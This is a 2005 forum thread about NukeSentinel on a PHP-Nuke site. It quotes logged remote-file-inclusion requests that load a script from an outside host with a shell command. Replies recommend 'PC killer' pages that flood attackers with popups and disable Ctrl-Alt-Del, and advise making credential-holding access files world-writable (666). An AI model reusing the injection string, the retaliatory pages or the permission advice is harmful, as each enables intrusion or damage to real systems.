| Author |
Message |
Gabe
Regular
Joined: Oct 30, 2005
Posts: 62
|
 Posted:
Fri Dec 23, 2005 4:13 pm |
|
Ok well I've been getting these abuse emails from sentinel 2.4.2 for about a week now, it happend like twice the first day, and has'nt happend since untill today. I've gotten I think 2 or 3 abuse emails today from sentinel, heres two emails from today:
| Quote: | Date & Time: 2005-12-23 15:11:52 CST GMT -0600 Blocked IP: 66.173.241.225 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: lwp-trivial/1.35
Query String: www.**********.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado Get String: www.**********.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado Post String: www.********.net/modules.php
Forwarded For: none
Client IP: none
Remote Address: 66.173.241.225
Remote Port: 38940
Request Method: GET
|
| Quote: | Date & Time: 2005-12-23 11:50:33 CST GMT -0600 Blocked IP: 202.226.224.67 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: lwp-trivial/1.35
Query String: www.************.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado Get String: www.************.net/modules.php?name=http://www.sanicentrum.be/private/tool25.dot?&cmd=cat bugado Post String: www.**********.net/modules.php
Forwarded For: none
Client IP: none
Remote Address: 202.226.224.67
Remote Port: 48527
Request Method: GET
|
Also I would like to mention that the IPs dont get baned on the "display blocked IPs" menu page in the sentinel admin. They dont get added there at all. I wanted to know why and I wanted to know if these really are attacks and what could happen if one does'nt get blocked?
Thanks. |
Last edited by Gabe on Fri Dec 23, 2005 5:20 pm; edited 1 time in total |
|
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Fri Dec 23, 2005 4:27 pm |
|
are you settings correct so they should be banned and not automaticaly flushed ?
And this is btw a script kiddy attack,i already maild the belgium website. |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 4:34 pm |
|
| hitwalker wrote: | are you settings correct so they should be banned and not automaticaly flushed ?
And this is btw a script kiddy attack,i already maild the belgium website. |
i have it set to email, block, & default page
what do you mean you emailed the belgium website? what site is that? |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 4:49 pm |
|
Thats this site :http://www.sanicentrum.be
But they dont know anything about this...their server was probably vunerable so ...
As for sentinel,i cant imagine it doesnt ban or ads the ip....better check again...,specially all settings. |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:00 pm |
|
| hitwalker wrote: | Thats this site :http://www.sanicentrum.be
But they dont know anything about this...their server was probably vunerable so ...
As for sentinel,i cant imagine it doesnt ban or ads the ip....better check again...,specially all settings. |
I dont know what else to check, I have it set to admin, block, goto default page |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:01 pm |
|
Have you tried to attack yourself and see what happens? |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:02 pm |
|
| hitwalker wrote: | | Have you tried to attack yourself and see what happens? |
attack my own site? no |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:04 pm |
|
Well try it and see what happens....unbanning yourself is easy so no worries.. |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:07 pm |
|
i dont know how to attack my site, a week ago I clicked one of the urls in the sentinel abuse email and I got that ban message when I went to that url on my site, I could browse the rest of the site and I never got added to the baned ips |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:09 pm |
|
ok..message between...
can you edit your first post please and delete the website lines...before someone is going to abuse it... |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:19 pm |
|
ok found a nice injection,got banned but still could visit your site aterwards... |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:22 pm |
|
Ok I edited my post.
So what should I do? why isn'nt it banning you? |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:25 pm |
|
well i mean..take out the belgium url to...
and are you sure you edited all files as specified in the install? |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:30 pm |
|
| hitwalker wrote: | well i mean..take out the belgium url to...
and are you sure you edited all files as specified in the install? |
yea iam sure |
| |
|
|
|
|
hitwalker
|
| Posted:
Fri Dec 23, 2005 5:47 pm |
|
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 5:54 pm |
|
I'll look at it in a minute. did they find a fix for my problem? |
| |
|
|
|
|
Gabe
|
| Posted:
Fri Dec 23, 2005 7:41 pm |
|
so am I supose to enable that cgi auth, the sentinel readme doesnt even explain what it is or does. i think it might be time to remove sentinel. I dont even know the passwords that my other admins use to login so Im not sure if I could do that admin auth whatever it is |
| |
|
|
|
|
Gabe
|
| Posted:
Sat Dec 24, 2005 8:00 pm |
|
Well i set passwords for all the admins(do they need to know the passwords i set for them?) and I set them to protected. do their passwords need to be the same as the ones they use to log into the site?
next question is what is cgi auth and do I need to mess with it? also when type in the path get the .htaccess file in the sentinel admin it says it does not exist, what about a .staccess file? I have one but its named sample.staccess and I have a sample.htaccess |
| |
|
|
|
|
thebishop
Worker
Joined: Aug 30, 2005
Posts: 244
Location: Flying to close to the sun
|
| Posted:
Sun Dec 25, 2005 6:33 pm |
|
gabe, you should rename the sample.staccess to just .staccess and make sure all your admin usernames and encrypted passwords are in it.
as for your .htaccess, it should be in the root directory of your nuke installation and chmod the file permissions to 666. some control panels seem to change the chmode setting, so make sure you use an ftp client to change the permissions on the .htaccess before uploading it to your nuke root folder so it will stay at 666.
then make sure you go here and download the pc killer and ip to country files. the ip to country will let you block certain countrys from even coming to your site. the countrys i have blocked are russia,brasil,netherlands and indonesia. you may want to block belgium.
the PC killer templates will block and forward the offender to a page that will give them a mass of popups and disable the ctrl ALT del keys so they will have to reboot there PC. this is a headache for script kiddies to keep having to deal with time and time again. especialy if they have to renew there ip too.
Only registered users can see links on this board! Get registered or login!
after you upload the PC killer templates go to your NS administration panel/blocker settings and in ADMIN,AUTHOR,UNION,CLIKE & FILTERS,
type in the Forword to: box. http://yourURLhere/abuse/abuse.html.
were "yoururlhere" will be the name of your site.
that url will be the url that script kiddie gets forworded too.
make sure to tick the write to .htaccess box. and under the Activate box, choose email,block & Forword. this blocks the ip,emails you,and forwords the attacker to the abuse.html file that will then give them a headache.
on the NS administrations page, make sure you have the correct pathes to both of the .htaccess & .staccess files on your site.
remember the .staccess file holds your admins information username PW ect. the .htaccess file controls who has access to it and your site by denying them or allowing them access.
this is what you should have in your .htaccess file.
{EDIT}
if you respond to this post ill get an email, so if you have any other questions, just post back. i hope this helps ya man. |
Last edited by thebishop on Tue Dec 27, 2005 6:28 pm; edited 1 time in total |
|
|
|
|
Gabe
|
| Posted:
Sun Dec 25, 2005 8:31 pm |
|
| thebishop wrote: | gabe, you should rename the sample.staccess to just .staccess and make sure all your admin usernames and encrypted passwords are in it.
as for your .htaccess, it should be in the root directory of your nuke installation and chmod the file permissions to 666. some control panels seem to change the chmode setting, so make sure you use an ftp client to change the permissions on the .htaccess before uploading it to your nuke root folder so it will stay at 666.
then make sure you go here and download the pc killer and ip to country files. the ip to country will let you block certain countrys from even coming to your site. the countrys i have blocked are russia,brasil,netherlands and indonesia. you may want to block belgium.
the PC killer templates will block and forward the offender to a page that will give them a mass of popups and disable the ctrl ALT del keys so they will have to reboot there PC. this is a headache for script kiddies to keep having to deal with time and time again. especialy if they have to renew there ip too.
Only registered users can see links on this board! Get registered or login!
after you upload the PC killer templates go to your NS administration panel/blocker settings and in ADMIN,AUTHOR,UNION,CLIKE & FILTERS,
type in the Forword to: box. http://yourURLhere/abuse/abuse.html.
were "yoururlhere" will be the name of your site.
that url will be the url that script kiddie gets forworded too.
make sure to tick the write to .htaccess box. and under the Activate box, choose email,block & Forword. this blocks the ip,emails you,and forwords the attacker to the abuse.html file that will then give them a headache.
on the NS administrations page, make sure you have the correct pathes to both of the .htaccess & .staccess files on your site.
remember the .staccess file holds your admins information username PW ect. the .htaccess file controls who has access to it and your site by denying them or allowing them access.
this is what you should have in your .htaccess file.
[CODE]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
deny from all
</FilesMatch>
<Limit GET POST>
Order Allow,Deny
Allow from all
</Limit>
[CODE]
if you respond to this post ill get an email, so if you have any other questions, just post back. i hope this helps ya man. |
yea it helps alot, I'll try and do all this in an hour or two. thanks
ok, well i started to do the first thing but i already have a .htaccess file, should i delete it then change my sample.htaccess and sample.staccess and remove the "sample" from the two files? |
| |
|
|
|
|
thebishop
|
| Posted:
Sun Dec 25, 2005 9:24 pm |
|
i believe the sample.staccess file is blank with no sample code.
i dont use the sample code from the sample.htaccess file so i dont believe you will need that either. what verson of nuke are you running.
no you dont have to delete the .htaccess file you already have, you can just use that one. just make sure you that code i posted is in it.
also make sure its chmode is set to 666.
if your using APACHE make sure that theres one empty line space at the bottom of the .htaccess file so it can be written too by NS.
if for some reason you get locked out of your site while doing this, go to your phpMYadmin and then to nsnst_blocked_ips and remove your ip address. then try to get back to your site. you should be fine.
for the sample.staccess file, just rename it .staccess and it should store all of your admins usernames and passwords in there.
post back if you need any more info. or contact me by MSN. |
Last edited by thebishop on Sun Dec 25, 2005 9:32 pm; edited 1 time in total |
|
|
|
|
Gabe
|
| Posted:
Sun Dec 25, 2005 9:31 pm |
|
| thebishop wrote: | no you dont have to delete the .htaccess file you already have, you can just use that one. just make sure you that code i posted is in it.
also make sure its chmode is set to 666. and that theres one empty line space at the bottom of the .htaccess file so it can be written too by NS.
if for some reason you get locked out of your site while doing this, go to your phpMYadmin and then to nsnst_blocked_ips and remove your ip address. then try to get back to your site. you should be fine.
for the sample.staccess file, just rename it .staccess and it should store all of your admins usernames and passwords in there.
post back if you need any more info. or contact me by MSN. |
Im not sure how to set the file to chmode 666 |
| |
|
|
|
|
thebishop
|
| Posted:
Sun Dec 25, 2005 9:34 pm |
|
in your FTP client you should have a place to change the file permissions.
its best to do it there. if you cant find it or dont have it thne youll have an option somewere on your web panel.
what web control panel are you using. |
| |
|
|
|
|
Gabe
|
| Posted:
Sun Dec 25, 2005 9:35 pm |
|
| thebishop wrote: | in your FTP client you should have a place to change the file permissions.
its best to do it there. if you cant find it or dont have it thne youll have an option somewere on your web panel.
what web control panel are you using. |
iam using cPanel, and my ftp client is ws ftp pro
edit::I think i figured it out, i right clicked on the file though my ftp client and went to properties and then it has a numeric value field. it was set to i think 644 and i just set it to 666, hopefully iam changing the right thing, does staccess also need to be set to 666? |
| |
|
|
|
|
thebishop
|
| Posted:
Sun Dec 25, 2005 9:47 pm |
|
if you open up wsftp pro and right click on the file you want to change permissions for, you should be given the option to change its attributes.
e.g 666,644,755 and so on. some ftp software calls this a custom command instaed of change file permissions.
yes both of the accessfiles need to be set to 666.
btw what version of nuke areyou running. |
Last edited by thebishop on Sun Dec 25, 2005 9:51 pm; edited 1 time in total |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
